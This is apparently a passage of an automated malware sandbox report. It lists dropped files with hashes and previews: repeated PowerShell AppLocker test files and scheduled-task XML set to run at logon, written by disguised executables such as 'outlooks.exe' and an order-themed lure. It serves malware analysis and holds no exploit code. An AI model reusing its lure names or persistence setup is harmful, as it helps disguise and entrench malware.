                                                                          SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                                          MD5:17BEFAA16080E50413FB7DA8FF6AF91B
                                                                          SHA1:ECF58B127FC3C252C0B43E843FD4637DDFE7637F
                                                                          SHA-256:3315AF1CBF58813AE0FB3973EE03327FE48048FF0AF07A9341B60743C8F4AEED
                                                                          SHA-512:FB4EDB25C053054B0D66AB643D3489EAB1044D9ACC8F33E4BAD0FDD81ED8643EA4D3A402CD1DBF7E56210F5A951B33F265BB150BA45E5DAEB05D1E637506DAFC
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_014tw42f.3kn.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wsshj13.goy.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21pq0djn.xz5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5n2lib0v.nd5.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aphui4sn.c43.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cct23hcs.eee.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpv0yjie.uhv.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbhh2wci.xhm.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_er5c1wqm.v5y.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4ocvcco.yh2.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3r0e4vb.yk5.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j40nhw3v.gj5.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4wsknh0.4u3.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1hgnzrq.jb4.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kahqzrlr.vzj.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2q4aj3w.nqs.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouybtd1k.uwg.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnddkawk.fbs.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfens2uk.tg5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0li0zjw.ba5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vng3saek.di3.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd3kwpr3.c3m.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj4pt2or.uj5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1n5z2w3.imp.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\tmp314.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                          C:\Users\user\AppData\Local\Temp\tmp537.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                          C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
